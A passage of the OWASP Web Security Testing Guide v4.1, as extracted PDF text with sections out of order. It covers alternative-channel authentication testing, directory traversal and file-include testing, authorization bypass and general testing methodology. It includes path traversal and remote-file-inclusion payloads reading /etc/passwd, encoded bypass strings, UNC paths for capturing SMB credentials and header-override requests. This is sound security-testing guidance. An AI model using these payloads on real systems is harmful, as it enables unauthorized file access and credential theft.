process.</p><p>https://cheatsheetseries.owasp.org/cheatsheets/Forgot_Password_Cheat_Sheet.html</p><p>Web Security Testing Guide v4.1</p><p>164</p><p>Testing for Weaker Authentication in Alternative Channel</p><p>ID</p><p>WSTG-ATHN-10</p><p>Summary</p><p>Even if the primary authentication mechanisms do not include any vulnerabilities, it may be that vulnerabilities exist in</p><p>alternative legitimate authentication user channels for the same user accounts. Tests should be undertaken to identify</p><p>alternative channels and, subject to test scoping, identify vulnerabilities.</p><p>The alternative user interaction channels could be utilized to circumvent the primary channel, or expose information</p><p>that can then be used to assist an attack against the primary channel. Some of these channels may themselves be</p><p>separate web applications using different host names or paths. For example:</p><p>Standard website</p><p>Mobile, or specific device, optimized website</p><p>Accessibility optimized website</p><p>Alternative country and language websites</p><p>Parallel websites that utilize the same user accounts (e.g. another website offering different functionally of the</p><p>same organization, a partner website with which user accounts are shared)</p><p>Development, test, UAT and staging versions of the standard website</p><p>But they could also be other types of application or business processes:</p><p>Mobile device app</p><p>Desktop application</p><p>Call center operators</p><p>Interactive voice response or phone tree systems</p><p>Note that the focus of this test is on alternative channels; some authentication alternatives might appear as different</p><p>content delivered via the same website and would almost certainly be in scope for testing. These are not discussed</p><p>further here, and should have been identified during information gathering and primary authentication testing. For</p><p>example:</p><p>Progressive enrichment and graceful degradation that change functionality</p><p>Site use without cookies</p><p>Site use without JavaScript</p><p>Site use without plugins such as for Flash and Java</p><p>Even if the scope of the test does not allow the alternative channels to be tested, their existence should be</p><p>documented. These may undermine the degree of assurance in the authentication mechanisms and may be a</p><p>precursor to additional testing.</p><p>Example</p><p>The primary website is:</p><p>http://www.example.com</p><p>and authentication functions always take place on pages using Transport Layer Security:</p><p>Web Security Testing Guide v4.1</p><p>165</p><p>https://www.example.com/myaccount/</p><p>However, a separate mobile-optimized website exists that does not use Transport Layer Security at all, and has a</p><p>weaker password recovery mechanism:</p><p>http://m.example.com/myaccount/</p><p>How to Test</p><p>Understand the Primary Mechanism</p><p>Fully test the website’s primary authentication functions. This should identify how accounts are issued, created or</p><p>changed and how passwords are recovered, reset, or changed. Additionally knowledge of any elevated privilege</p><p>authentication and authentication protection measures should be known. These precursors are necessary to be able to</p><p>compare with any alternative channels.</p><p>Identify Other Channels</p><p>Other channels can be found by using the following methods:</p><p>Reading site content, especially the home page, contact us, help pages, support articles and FAQs, T&Cs, privacy</p><p>notices, the robots.txt file and any sitemap.xml files.</p><p>Searching HTTP proxy logs, recorded during previous information gathering and testing, for strings such as</p><p>“mobile”, “android”, blackberry”, “ipad”, “iphone”, “mobile app”, “e-reader”, “wireless”, “auth”, “sso”, “single sign on”</p><p>in URL paths and body content.</p><p>Use search engines to find different websites from the same organization, or using the same domain name, that</p><p>have similar home page content or which also have authentication mechanisms.</p><p>For each possible channel confirm whether user accounts are shared across these, or provide access to the same or</p><p>similar functionality.</p><p>Enumerate Authentication Functionality</p><p>For each alternative channel where user accounts or functionality are shared, identify if all the authentication functions</p><p>of the primary channel are available, and if anything extra exists. It may be useful to create a grid like the one below:</p><p>Primary Mobile Call Center Partner Website</p><p>Register Yes - -</p><p>Log in Yes Yes Yes(SSO)</p><p>Log out - - -</p><p>Password reset Yes Yes -</p><p>- Change password - -</p><p>In this example, mobile has an extra function “change password” but does not offer “log out”. A limited number of tasks</p><p>are also possible by phoning the call center. Call centers can be interesting,</p><p>because their identity confirmation checks</p><p>might be weaker than the website’s, allowing this channel to be used to aid an attack against a user’s account.</p><p>While enumerating these it is worth taking note of how session management is undertaken, in case there is overlap</p><p>across any channels (e.g. cookies scoped to the same parent domain name, concurrent sessions allowed across</p><p>channels, but not on the same channel).</p><p>Review and Test</p><p>Alternative channels should be mentioned in the testing report, even if they are marked as “information only” or “out of</p><p>scope”. In some cases the test scope might include the alternative channel (e.g. because it is just another path on the</p><p>target host name), or may be added to the scope after discussion with the owners of all the channels. If testing is</p><p>permitted and authorized, all the other authentication tests in this guide should then be performed, and compared</p><p>against the primary channel.</p><p>Web Security Testing Guide v4.1</p><p>166</p><p>Related Test Cases</p><p>The test cases for all the other authentication tests should be utilized.</p><p>Remediation</p><p>Ensure a consistent authentication policy is applied across all channels so that they are equally secure.</p><p>Web Security Testing Guide v4.1</p><p>167</p><p>4.5 Authorization Testing</p><p>4.5.1 Testing Directory Traversal File Include</p><p>4.5.2 Testing for Bypassing Authorization Schema</p><p>4.5.3 Testing for Privilege Escalation</p><p>4.5.4 Testing for Insecure Direct Object References</p><p>Web Security Testing Guide v4.1</p><p>168</p><p>Testing Directory Traversal File Include</p><p>ID</p><p>WSTG-ATHZ-01</p><p>Summary</p><p>Many web applications use and manage files as part of their daily operation. Using input validation methods that have</p><p>not been well designed or deployed, an aggressor could exploit the system in order to read or write files that are not</p><p>intended to be accessible. In particular situations, it could be possible to execute arbitrary code or system commands.</p><p>Traditionally, web servers and web applications implement authentication mechanisms to control access to files and</p><p>resources. Web servers try to confine users’ files inside a “root directory” or “web document root”, which represents a</p><p>physical directory on the file system. Users have to consider this directory as the base directory into the hierarchical</p><p>structure of the web application.</p><p>The definition of the privileges is made usingAccess Control Lists (ACL) which identify which users or groups are</p><p>supposed to be able to access, modify, or execute a specific file on the server. These mechanisms are designed to</p><p>prevent malicious users from accessing sensitive files (for example, the common /etc/passwd file on a UNIX-like</p><p>platform) or to avoid the execution of system commands.</p><p>Many web applications use server-side scripts to include different kinds of files. It is quite common to use this method to</p><p>manage images, templates, load static texts, and so on. Unfortunately, these applications expose security</p><p>vulnerabilities if input parameters (i.e., form parameters, cookie values) are not correctly validated.</p><p>In web servers and web applications, this kind of problem arises in path traversal/file include attacks. By exploiting this</p><p>kind of vulnerability, an attacker is able to read directories or files which they normally couldn’t read, access data</p><p>outside the web document root, or include scripts and other kinds of files from external websites.</p><p>For the purpose of the OWASP Testing Guide, only the security threats related to web applications will be considered</p><p>and not threats to web servers (e.g., the infamous “%5c escape code” into Microsoft IIS web server). Further reading</p><p>suggestions will be provided in the references section for interested readers.</p><p>This kind of attack is also known as thedot-dot-slashattack (../),directory traversal,directory climbing, orbacktracking.</p><p>During an assessment, to discover path traversal and file include flaws, testers need to perform two different stages:</p><p>(a) Input Vectors Enumeration (a systematic evaluation of each input vector)</p><p>(b) Testing Techniques (a methodical evaluation of each attack technique used by an attacker to exploit the</p><p>vulnerability)</p><p>How to Test</p><p>Black-Box Testing</p><p>Input Vectors Enumeration</p><p>In order to determine which part of the application is vulnerable to input validation bypassing, the tester needs to</p><p>enumerate all parts of the application that accept content from the user. This also includes HTTP GET and POST</p><p>queries and common options like file uploads and HTML forms.</p><p>Here are some examples of the checks to be performed at this stage:</p><p>Are there request parameters which could be used for file-related operations?</p><p>Web Security Testing Guide v4.1</p><p>169</p><p>Are there unusual file extensions?</p><p>Are there interesting variable names?</p><p>http://example.com/getUserProfile.jsp?item=ikki.html</p><p>http://example.com/index.php?file=content</p><p>http://example.com/main.cgi?home=index.htm</p><p>Is it possible to identify cookies used by the web application for the dynamic generation of pages or templates?</p><p>Cookie: ID=d9ccd3f4f9f18cc1:TM=2166255468:LM=1162655568:S=3cFpqbJgMSSPKVMV:TEMPLATE=flower</p><p>Cookie: USER=1826cc8f:PSTYLE=GreenDotRed</p><p>Testing Techniques</p><p>The next stage of testing is analyzing the input validation functions present in the web application. Using the previous</p><p>example, the dynamic page called getUserProfile.jsp loads static information from a file and shows the content to users.</p><p>An attacker could insert the malicious string “../../../../etc/passwd” to include the password hash file of a Linux/UNIX</p><p>system. Obviously, this kind of attack is possible only if the validation checkpoint fails; according to the file system</p><p>privileges, the web application itself must be able to read the file.</p><p>To successfully test for this flaw, the tester needs to have knowledge of the system being tested and the location of the</p><p>files being requested. There is no point requesting /etc/passwd from an IIS web server.</p><p>http://example.com/getUserProfile.jsp?item=../../../../etc/passwd</p><p>For the cookies example:</p><p>Cookie: USER=1826cc8f:PSTYLE=../../../../etc/passwd</p><p>It’s also possible to include files and scripts located on external website.</p><p>http://example.com/index.php?file=http://www.owasp.org/malicioustxt</p><p>If protocols are accepted as arguments, as in the above example, it’s also possible to probe the local filesystem this</p><p>way.</p><p>http://example.com/index.php?file=file:///etc/passwd</p><p>If protocols are accepted as arguments, as in the above examples, it’s also possible to probe the local services and</p><p>nearby services.</p><p>http://example.com/index.php?file=http://localhost:8080 or http://example.com/index.php?</p><p>file=http://192.168.0.2:9080</p><p>The following example will demonstrate how it is possible to show the source code of a CGI component, without using</p><p>any path traversal characters.</p><p>http://example.com/main.cgi?home=main.cgi</p><p>The component called “main.cgi” is located in the same directory as the normal HTML static files used by the</p><p>application. In some cases the tester needs to encode the requests using special characters (like the “.” dot, “%00” null,</p><p>…) in order to bypass file extension controls or to prevent script execution.</p><p>Tip: It’s a common mistake by developers to not expect every form of encoding and therefore only do validation for</p><p>basic encoded content. If at first the test string isn’t successful, try another encoding scheme.</p><p>Each operating system uses different characters as path separator:</p><p>Unix-like OS:</p><p>root directory: “ / “</p><p>Web Security Testing Guide v4.1</p><p>170</p><p>directory separator: “ / “</p><p>Windows OS’ Shell’:</p><p>root directory: “ <drive letter>:\ “</p><p>directory separator: “" or “/“</p><p>Classic Mac OS:</p><p>root directory: “ <drive letter>: “</p><p>directory separator: “ : “</p><p>We should take in to account the following character encoding mechanisms:</p><p>URL encoding and double URL encoding</p><p>%2e%2e%2f represents ../</p><p>%2e%2e/ represents ../</p><p>..%2f represents ../</p><p>%2e%2e%5c represents ..\</p><p>%2e%2e\ represents ..\</p><p>..%5c represents ..\</p><p>%252e%252e%255c represents ..\</p><p>..%255c represents ..\ and so on.</p><p>Unicode/UTF-8</p><p>such as the Gramm-Leach-Bliley Act, or from state laws, such as the California SB-1386.</p><p>For organizations based in EU countries, both country-specific regulation and EU Directives may apply. For example,</p><p>Directive 96/46/EC4 makes it mandatory to treat personal data in applications with due care, whatever the application.</p><p>Develop the Right Mindset</p><p>Successfully testing an application for security vulnerabilities requires thinking “outside of the box.” Normal use cases</p><p>will test the normal behavior of the application when a user is using it in the manner that is expected. Good security</p><p>testing requires going beyond what is expected and thinking like an attacker who is trying to break the application.</p><p>Creative thinking can help to determine what unexpected data may cause an application to fail in an insecure manner.</p><p>It can also help find any assumptions made by web developers that are not always true, and how those assumptions</p><p>can be subverted. One reason that automated tools do a poor job of testing for vulnerabilities is that automated tools do</p><p>not think creatively. Creative thinking must be done on a case-by-case basis, as most web applications are being</p><p>developed in a unique way (even when using common frameworks).</p><p>Understand the Subject</p><p>One of the first major initiatives in any good security program should be to require accurate documentation of the</p><p>application. The architecture, data-flow diagrams, use cases, etc, should be recorded in formal documents and made</p><p>available for review. The technical specification and application documents should include information that lists not</p><p>only the desired use cases, but also any specifically disallowed use cases. Finally, it is good to have at least a basic</p><p>security infrastructure that allows the monitoring and trending of attacks against an organization’s applications and</p><p>network (e.g., IDS systems).</p><p>Use the Right Tools</p><p>While we have already stated that there is no silver bullet tool, tools do play a critical role in the overall security</p><p>program. There is a range of open source and commercial tools that can automate many routine security tasks. These</p><p>tools can simplify and speed up the security process by assisting security personnel in their tasks. However, it is</p><p>important to understand exactly what these tools can and cannot do so that they are not oversold or used incorrectly.</p><p>The Devil is in the Details</p><p>It is critical not to perform a superficial security review of an application and consider it complete. This will instill a false</p><p>sense of confidence that can be as dangerous as not having done a security review in the first place. It is vital to</p><p>carefully review the findings and weed out any false positives that may remain in the report. Reporting an incorrect</p><p>security finding can often undermine the valid message of the rest of a security report. Care should be taken to verify</p><p>that every possible section of application logic has been tested, and that every use case scenario was explored for</p><p>possible vulnerabilities.</p><p>Use Source Code When Available</p><p>While black-box penetration test results can be impressive and useful to demonstrate how vulnerabilities are exposed</p><p>in a production environment, they are not the most effective or efficient way to secure an application. It is difficult for</p><p>dynamic testing to test the entire code base, particularly if many nested conditional statements exist. If the source code</p><p>for the application is available, it should be given to the security staff to assist them while performing their review. It is</p><p>possible to discover vulnerabilities within the application source that would be missed during a black-box engagement.</p><p>Develop Metrics</p><p>An important part of a good security program is the ability to determine if things are getting better. It is important to track</p><p>the results of testing engagements, and develop metrics that will reveal the application security trends within the</p><p>organization.</p><p>Good metrics will show:</p><p>If more education and training are required;</p><p>If there is a particular security mechanism that is not clearly understood by the development team;</p><p>If the total number of security related problems being found each month is going down.</p><p>https://www.ftc.gov/tips-advice/business-center/privacy-and-security/gramm-leach-bliley-act</p><p>https://leginfo.legislature.ca.gov/faces/billTextClient.xhtml?bill_id=200120020SB1386</p><p>https://ec.europa.eu/info/policies/justice-and-fundamental-rights_en</p><p>Web Security Testing Guide v4.1</p><p>15</p><p>Consistent metrics that can be generated in an automated way from available source code will also help the</p><p>organization in assessing the effectiveness of mechanisms introduced to reduce security bugs in software</p><p>development. Metrics are not easily developed, so using standard metrics like those provided by the OWASP Metrics</p><p>project and other organizations is a good starting point.</p><p>Document the Test Results</p><p>To conclude the testing process, it is important to produce a formal record of what testing actions were taken, by whom,</p><p>when they were performed, and details of the test findings. It is wise to agree on an acceptable format for the report that</p><p>is useful to all concerned parties, which may include developers, project management, business owners, IT</p><p>department, audit, and compliance.</p><p>The report should clearly identify to the business owner where material risks exist, and do so in a manner sufficient to</p><p>get their backing for subsequent mitigation actions. The report should also be clear to the developer in pin-pointing the</p><p>exact function that is affected by the vulnerability and associated recommendations for resolving issues in a language</p><p>that the developer will understand. The report should also allow another security tester to reproduce the results. Writing</p><p>the report should not be overly burdensome on the security tester themselves. Security testers are not generally</p><p>renowned for their creative writing skills, and agreeing on a complex report can lead to instances where test results are</p><p>not properly documented. Using a security test report template can save time and ensure that results are documented</p><p>accurately and consistently, and are in a format that is suitable for the audience.</p><p>Testing Techniques Explained</p><p>This section presents a high-level overview of various testing techniques that can be employed when building a testing</p><p>program. It does not present specific methodologies for these techniques, as this information is covered in Chapter 3.</p><p>This section is included to provide context for the framework presented in the next chapter and to highlight the</p><p>advantages and disadvantages of some of the techniques that should be considered. In particular, we will cover:</p><p>Manual Inspections & Reviews</p><p>Threat Modeling</p><p>Code Review</p><p>Penetration Testing</p><p>Manual Inspections and Reviews</p><p>Overview</p><p>Manual inspections are human reviews that typically test the security implications of people, policies, and processes.</p><p>Manual inspections can also include inspection of technology decisions such as architectural designs. They are</p><p>usually conducted by analyzing documentation or performing interviews with the designers or system owners.</p><p>While the concept of manual inspections and human reviews is simple, they can be among the most powerful and</p><p>effective techniques available. By asking someone how something works and why it was implemented in a specific</p><p>way, the tester can quickly determine if any security concerns are likely to be evident. Manual inspections and reviews</p><p>are one of the few ways to test the software development life-cycle process itself and to ensure that there is an</p><p>adequate policy or skill set in place.</p><p>As with many things in life, when conducting manual inspections and reviews it is recommended that a trust-but-verify</p><p>model is adopted. Not everything that the tester is shown or told will be accurate. Manual reviews are particularly good</p><p>for testing whether people understand the security process, have been made aware of policy, and have the appropriate</p><p>skills to design or implement a secure application.</p><p>Encoding (it only works in systems that are able to accept overlong UTF-8 sequences)</p><p>..%c0%af represents ../</p><p>..%c1%9c represents ..\</p><p>There are other OS and application framework specific considerations as well. For instance, Windows is flexible in its</p><p>parsing of file paths.</p><p>Windows shell: Appending any of the following to paths used in a shell command results in no difference in</p><p>function:</p><p>Angle brackets “>” and “<” at the end of the path</p><p>Double quotes (closed properly) at the end of the path</p><p>Extraneous current directory markers such as “./” or “.\”</p><p>Extraneous parent directory markers with arbitrary items that may or may not exist Examples:</p><p>file.txt</p><p>file.txt...</p><p>file.txt<spaces></p><p>file.txt””””</p><p>file.txt<<<>>><</p><p>./././file.txt</p><p>nonexistant/../file.txt</p><p>Windows API: The following items are discarded when used in any shell command or API call where a string is</p><p>taken as a filename:</p><p>Web Security Testing Guide v4.1</p><p>171</p><p>periods</p><p>spaces</p><p>Windows UNC Filepaths: Used to reference files on SMB shares. Sometimes, an application can be made to refer</p><p>to files on a remote UNC filepath. If so, the Windows SMB server may send stored credentials to the attacker, which</p><p>can be captured and cracked. These may also be used with a self-referential IP address or domain name to evade</p><p>filters, or used to access files on SMB shares inaccessible to the attacker, but accessible from the web server.</p><p>\\server_or_ip\path\to\file.abc</p><p>\\?\server_or_ip\path\to\file.abc</p><p>Windows NT Device Namespace: Used to refer to the Windows device namespace. Certain references will allow</p><p>access to file systems using a different path.</p><p>May be equivalent to a drive letter such as c:\ , or even a drive volume without an assigned letter.</p><p>\\.\GLOBALROOT\Device\HarddiskVolume1\</p><p>Refers to the first disc drive on the machine. \\.\CdRom0\</p><p>Gray-Box Testing</p><p>When the analysis is performed with a gray-box testing approach, testers have to follow the same methodology as in</p><p>black-box testing. However, since they can review the source code, it is possible to search the input vectors (stage (a)</p><p>of the testing) more easily and accurately. During a source code review, they can use simple tools (such as the grep</p><p>command) to search for one or more common patterns within the application code: inclusion functions/methods,</p><p>filesystem operations, and so on.</p><p>PHP: include(), include_once(), require(), require_once(), fopen(), readfile(), ...</p><p>JSP/Servlet: java.io.File(), java.io.FileReader(), ...</p><p>ASP: include file, include virtual, ...</p><p>Using online code search engines (e.g., Searchcode), it may also be possible to find path traversal flaws in Open</p><p>Source software published on the Internet.</p><p>For PHP, testers can use:</p><p>lang:php (include|require)(_once)?\s*['"(]?\s*\$_(GET|POST|COOKIE)</p><p>Using the gray-box testing method, it is possible to discover vulnerabilities that are usually harder to discover, or even</p><p>impossible to find during a standard black-box assessment.</p><p>Some web applications generate dynamic pages using values and parameters stored in a database. It may be possible</p><p>to insert specially crafted path traversal strings when the application adds data to the database. This kind of security</p><p>problem is difficult to discover due to the fact the parameters inside the inclusion functions seem internal and “safe” but</p><p>are not in reality.</p><p>Additionally, by reviewing the source code it is possible to analyze the functions that are supposed to handle invalid</p><p>input: some developers try to change invalid input to make it valid, avoiding warnings and errors. These functions are</p><p>usually prone to security flaws.</p><p>Consider a web application with these instructions:</p><p>filename = Request.QueryString(“file”);</p><p>Replace(filename, “/”,”\”);</p><p>Replace(filename, “..\”,””);</p><p>https://searchcode.com/</p><p>Web Security Testing Guide v4.1</p><p>172</p><p>Testing for the flaw is achieved by:</p><p>file=....//....//boot.ini</p><p>file=....\\....\\boot.ini</p><p>file= ..\..\boot.ini</p><p>Tools</p><p>DotDotPwn - The Directory Traversal Fuzzer</p><p>Path Traversal Fuzz Strings (from WFuzz Tool)</p><p>OWASP ZAP</p><p>Burp Suite</p><p>Enconding/Decoding tools</p><p>String searcher “grep”</p><p>DirBuster</p><p>References</p><p>Whitepapers</p><p>phpBB Attachment Mod Directory Traversal HTTP POST Injection</p><p>Windows File Pseudonyms: Pwnage and Poetry</p><p>https://github.com/wireghoul/dotdotpwn</p><p>https://github.com/xmendez/wfuzz/blob/master/wordlist/Injections/Traversal.txt</p><p>https://www.zaproxy.org/</p><p>https://portswigger.net/</p><p>https://www.gnu.org/software/grep/</p><p>https://wiki.owasp.org/index.php/Category:OWASP_DirBuster_Project</p><p>https://seclists.org/vulnwatch/2004/q4/33</p><p>https://www.slideshare.net/BaronZor/windows-file-pseudonyms</p><p>Web Security Testing Guide v4.1</p><p>173</p><p>Testing for Bypassing Authorization Schema</p><p>ID</p><p>WSTG-ATHZ-02</p><p>Summary</p><p>This kind of test focuses on verifying how the authorization schema has been implemented for each role or privilege to</p><p>get access to reserved functions and resources.</p><p>For every specific role the tester holds during the assessment, for every function and request that the application</p><p>executes during the post-authentication phase, it is necessary to verify:</p><p>Is it possible to access that resource even if the user is not authenticated?</p><p>Is it possible to access that resource after the log-out?</p><p>Is it possible to access functions and resources that should be accessible to a user that holds a different role or</p><p>privilege?</p><p>Try to access the application as an administrative user and track all the administrative functions.</p><p>Is it possible to access administrative functions also if the tester is logged as a user with standard privileges?</p><p>Is it possible to use these administrative functions as a user with a different role and for whom that action should be</p><p>denied?</p><p>How to Test</p><p>Testing for Access to Administrative Functions</p><p>For example, suppose that the AddUser.jsp function is part of the administrative menu of the application, and it is</p><p>possible to access it by requesting the following URL:</p><p>https://www.example.com/admin/addUser.jsp</p><p>Then, the following HTTP request is generated when calling the AddUser function:</p><p>POST /admin/addUser.jsp HTTP/1.1</p><p>Host: www.example.com</p><p>[other HTTP headers]</p><p>userID=fakeuser&role=3&group=grp001</p><p>What happens if a non-administrative user tries to execute that request? Will the user be created? If so, can the new</p><p>user use their privileges?</p><p>Testing for Access to Resources Assigned to a Different Role</p><p>For example analyze an application that uses a shared directory to store temporary PDF files for different users.</p><p>Suppose that documentABC.pdf should be accessible only by the user test1 with roleA . Verify if user test2 with</p><p>roleB can access that resource.</p><p>Testing for Special Request Header Handling</p><p>Some applications support non-standard headers such as X-Original-URL or X-Rewrite-URL in order to allow</p><p>overriding the target URL in requests with the one specified in the header value.</p><p>Web Security Testing Guide v4.1</p><p>174</p><p>This behavior can be leveraged in a situation in which the application is behind a component that applies access</p><p>control restriction based on the request URL.</p><p>The kind of access control restriction based on the request URL can be, for example, blocking access from Internet to</p><p>an administration console exposed on /console or /admin .</p><p>To detect the support for the header X-Original-URL or X-Rewrite-URL , the following steps can be applied.</p><p>1. Send a Normal Request without Any X-Original-Url or X-Rewrite-Url Header</p><p>GET / HTTP/1.1</p><p>Host: www.example.com</p><p>[other standard HTTP headers]</p><p>2. Send a Request with an X-Original-Url Header Pointing to a Non-Existing Resource</p><p>GET / HTTP/1.1</p><p>Host: www.example.com</p><p>X-Original-URL: /donotexist1</p><p>[other standard HTTP headers]</p><p>3. Send a Request with an X-Rewrite-Url Header Pointing to a Non-Existing Resource</p><p>GET / HTTP/1.1</p><p>Host: www.example.com</p><p>X-Rewrite-URL: /donotexist2</p><p>[other standard HTTP headers]</p><p>If the response for either request contains markers that the resource was not found, this indicates that the application</p><p>supports the special request</p><p>Other activities, including manually reviewing the documentation, secure coding policies, security requirements, and</p><p>architectural designs, should all be accomplished using manual inspections.</p><p>Advantages</p><p>Requires no supporting technology</p><p>Web Security Testing Guide v4.1</p><p>16</p><p>Can be applied to a variety of situations</p><p>Flexible</p><p>Promotes teamwork</p><p>Early in the SDLC</p><p>Disadvantages</p><p>Can be time-consuming</p><p>Supporting material not always available</p><p>Requires significant human thought and skill to be effective</p><p>Threat Modeling</p><p>Overview</p><p>Threat modeling has become a popular technique to help system designers think about the security threats that their</p><p>systems and applications might face. Therefore, threat modeling can be seen as risk assessment for applications. It</p><p>enables the designer to develop mitigation strategies for potential vulnerabilities and helps them focus their inevitably</p><p>limited resources and attention on the parts of the system that most require it. It is recommended that all applications</p><p>have a threat model developed and documented. Threat models should be created as early as possible in the SDLC,</p><p>and should be revisited as the application evolves and development progresses.</p><p>To develop a threat model, we recommend taking a simple approach that follows the NIST 800-30 standard for risk</p><p>assessment. This approach involves:</p><p>Decomposing the application – use a process of manual inspection to understand how the application works, its</p><p>assets, functionality, and connectivity.</p><p>Defining and classifying the assets – classify the assets into tangible and intangible assets and rank them</p><p>according to business importance.</p><p>Exploring potential vulnerabilities - whether technical, operational, or managerial.</p><p>Exploring potential threats – develop a realistic view of potential attack vectors from an attacker’s perspective by</p><p>using threat scenarios or attack trees.</p><p>Creating mitigation strategies – develop mitigating controls for each of the threats deemed to be realistic.</p><p>The output from a threat model itself can vary but is typically a collection of lists and diagrams. The OWASP Code</p><p>Review Guide outlines an Application Threat Modeling methodology that can be used as a reference for testing</p><p>applications for potential security flaws in the design of the application. There is no right or wrong way to develop threat</p><p>models and perform information risk assessments on applications.</p><p>Advantages</p><p>Practical attacker’s view of the system</p><p>Flexible</p><p>Early in the SDLC</p><p>Disadvantages</p><p>Relatively new technique</p><p>Good threat models don’t automatically mean good software</p><p>Source Code Review</p><p>Overview</p><p>Source code review is the process of manually checking the source code of a web application for security issues. Many</p><p>serious security vulnerabilities cannot be detected with any other form of analysis or testing. As the popular saying</p><p>goes “if you want to know what’s really going on, go straight to the source.” Almost all security experts agree that there</p><p>is no substitute for actually looking at the code. All the information for identifying security problems is there in the code,</p><p>https://csrc.nist.gov/publications/detail/sp/800-30/rev-1/final</p><p>Web Security Testing Guide v4.1</p><p>17</p><p>somewhere. Unlike testing third-party closed software such as operating systems, when testing web applications</p><p>(especially if they have been developed in-house) the source code should be made available for testing purposes.</p><p>Many unintentional but significant security problems are also extremely difficult to discover with other forms of analysis</p><p>or testing, such as penetration testing. This makes source code analysis the technique of choice for technical testing.</p><p>With the source code, a tester can accurately determine what is happening (or is supposed to be happening) and</p><p>remove the guess work of black-box testing.</p><p>Examples of issues that are particularly conducive to being found through source code reviews include concurrency</p><p>problems, flawed business logic, access control problems, and cryptographic weaknesses, as well as backdoors,</p><p>Trojans, Easter eggs, time bombs, logic bombs, and other forms of malicious code. These issues often manifest</p><p>themselves as the most harmful vulnerabilities in web sites. Source code analysis can also be extremely efficient to find</p><p>implementation issues such as places where input validation was not performed or where fail-open control procedures</p><p>may be present. Operational procedures need to be reviewed as well, since the source code being deployed might not</p><p>be the same as the one being analyzed herein. Ken Thompson’s Turing Award speech describes one possible</p><p>manifestation of this issue.</p><p>Advantages</p><p>Completeness and effectiveness</p><p>Accuracy</p><p>Fast (for competent reviewers)</p><p>Disadvantages</p><p>Requires highly skilled security developers</p><p>Can miss issues in compiled libraries</p><p>Cannot detect run-time errors easily</p><p>The source code actually deployed might differ from the one being analyzed</p><p>For more on code review, see the OWASP code review project.</p><p>Penetration Testing</p><p>Overview</p><p>Penetration testing has been a common technique used to test network security for many years. It is also commonly</p><p>known as black-box testing or ethical hacking. Penetration testing is essentially the “art” of testing a running application</p><p>remotely to find security vulnerabilities, without knowing the inner workings of the application itself. Typically, the</p><p>penetration test team is able to access an application as if they were users. The tester acts like an attacker and attempts</p><p>to find and exploit vulnerabilities. In many cases the tester will be given a valid account on the system.</p><p>While penetration testing has proven to be effective in network security, the technique does not naturally translate to</p><p>applications. When penetration testing is performed on networks and operating systems, the majority of the work</p><p>involved is in finding, and then exploiting, known vulnerabilities in specific technologies. As web applications are</p><p>almost exclusively bespoke, penetration testing in the web application arena is more akin to pure research. Some</p><p>automated penetration testing tools have been developed, but considering the bespoke nature of web applications,</p><p>their effectiveness alone is usually poor.</p><p>Many people use web application penetration testing as their primary security testing technique. Whilst it certainly has</p><p>its place in a testing program, we do not believe it should be considered as the primary or only testing technique. As</p><p>Gary McGraw wrote in Software Penetration Testing, “In practice, a penetration test can only identify a small</p><p>representative sample of all possible security risks in a system.” However, focused penetration testing (i.e., testing that</p><p>attempts to exploit known vulnerabilities detected in previous reviews) can be useful in detecting if some specific</p><p>vulnerabilities are actually fixed in the source code deployed on the web site.</p><p>Advantages</p><p>https://ia600903.us.archive.org/11/items/pdfy-Qf4sZZSmHKQlHFfw/p761-thompson.pdf</p><p>https://wiki.owasp.org/index.php/Category:OWASP_Code_Review_Project</p><p>https://www.garymcgraw.com/wp-content/uploads/2015/11/bsi6-pentest.pdf</p><p>Web Security Testing Guide v4.1</p><p>18</p><p>Can be fast (and therefore cheap)</p><p>Requires a relatively lower skill-set than source code review</p><p>Tests the code that is actually being exposed</p><p>Disadvantages</p><p>Too late in the SDLC</p><p>Front-impact testing only</p><p>The Need for a Balanced Approach</p><p>With so many techniques and approaches to testing the security of web applications, it can be difficult to understand</p><p>which techniques to use or when to use them. Experience shows that there is no right or wrong answer to the question</p><p>of exactly which techniques should be used to build a testing framework. In fact, all techniques should be used to test</p><p>all the areas that need to be tested.</p><p>Although it is clear that there is no single technique that can be performed to effectively cover all security testing and</p><p>ensure that all issues have been addressed, many companies adopt only one approach. The single approach used</p><p>has</p><p>historically been penetration testing. Penetration testing, while useful, cannot effectively address many of the</p><p>issues that need to be tested. It is simply “too little too late” in the SDLC.</p><p>The correct approach is a balanced approach that includes several techniques, from manual reviews to technical</p><p>testing. A balanced approach should cover testing in all phases of the SDLC. This approach leverages the most</p><p>appropriate techniques available, depending on the current SDLC phase.</p><p>Of course there are times and circumstances where only one technique is possible. For example, consider a test of a</p><p>web application that has already been created, but where the testing party does not have access to the source code. In</p><p>this case, penetration testing is clearly better than no testing at all. However, the testing parties should be encouraged</p><p>to challenge assumptions, such as not having access to source code, and to explore the possibility of more complete</p><p>testing.</p><p>A balanced approach varies depending on many factors, such as the maturity of the testing process and corporate</p><p>culture. It is recommended that a balanced testing framework should look something like the representations shown in</p><p>Figure 3 and Figure 4. The following figure shows a typical proportional representation overlaid onto the SLDC. In</p><p>keeping with research and experience, it is essential that companies place a higher emphasis on the early stages of</p><p>development.</p><p>Web Security Testing Guide v4.1</p><p>19</p><p>Figure 2-3: Proportion of Test Effort in SDLC</p><p>The following figure shows a typical proportional representation overlaid onto testing techniques.</p><p>Web Security Testing Guide v4.1</p><p>20</p><p>Figure 2-4: Proportion of Test Effort According to Test Technique</p><p>A Note about Web Application Scanners</p><p>Many organizations have started to use automated web application scanners. While they undoubtedly have a place in</p><p>a testing program, some fundamental issues need to be highlighted about why it is believed that automating black-box</p><p>testing is not (nor will ever be) completely effective. However, highlighting these issues should not discourage the use</p><p>of web application scanners. Rather, the aim is to ensure the limitations are understood and testing frameworks are</p><p>planned appropriately.</p><p>It is helpful to understand the efficacy and limitations of automated vulnerability detection tools. To this end, the OWASP</p><p>Benchmark Project is a test suite designed to evaluate the speed, coverage, and accuracy of automated software</p><p>vulnerability detection tools and services. Benchmarking can help to test the capabilities of these automated tools, and</p><p>help to make their usefulness explicit.</p><p>The following examples show why automated black-box testing may not be effective.</p><p>Example 1: Magic Parameters</p><p>Imagine a simple web application that accepts a name-value pair of “magic” and then the value. For simplicity, the GET</p><p>request may be: http://www.host/application?magic=value</p><p>To further simplify the example, the values in this case can only be ASCII characters a – z (upper or lowercase) and</p><p>integers 0 – 9.</p><p>The designers of this application created an administrative backdoor during testing, but obfuscated it to prevent the</p><p>casual observer from discovering it. By submitting the value sf8g7sfjdsurtsdieerwqredsgnfg8d (30 characters), the user</p><p>will then be logged in and presented with an administrative screen with total control of the application. The HTTP</p><p>request is now: 